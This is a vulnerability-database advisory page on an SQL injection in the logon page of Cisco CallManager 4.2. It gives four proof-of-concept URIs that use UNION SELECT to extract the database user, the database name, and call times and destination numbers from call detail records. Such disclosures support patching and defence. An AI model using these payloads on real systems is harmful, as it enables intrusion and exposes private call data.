Lucene search
K

Cisco CallManager <= 4.2 / CUCM 4.2 Logon Page lang Parameter SQL Injection

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

Cisco CallManager and Unified Communications Manager 4.2 SQL Injectio

Code

                                                source: http://www.securityfocus.com/bid/25480/info

Cisco Unified CallManager and Unified Communications Manager are prone to multiple input-validation vulnerabilities because the applications fail to properly sanitize user-supplied input. These issues include a cross-site scripting vulnerability and an SQL-injection vulnerability.

A successful exploit may allow an attacker to steal cookie-based authentication credentials, execute malicious script code in a user&#39;s browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

The following proof-of-concept URIs are available for the SQL-injection vulnerability:

To display the logged-in database user:

https://www.example.com/CCMUser/logon.asp?lang=en&#39;+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+&#39;&#39;=&#39;

To display the selected database:

https://www.example.com/CCMUser/logon.asp?lang=en&#39;+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+&#39;&#39;=&#39;

To display the UNIX time when a call was made from extension 12345:

https://www.example.com/CCMUser/logon.asp?lang=en&#39;+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+&#39;&#39;+and+callingPartyNumber=&#39;12345&#39;;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+&#39;&#39;=&#39;

To display the destination number for that call. Replace &#34;1174900000&#34; with the value from the previous query:

https://www.example.com/CCMUser/logon.asp?lang=en&#39;+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber=&#39;12345&#39;+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+&#39;&#39;=&#39; 
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation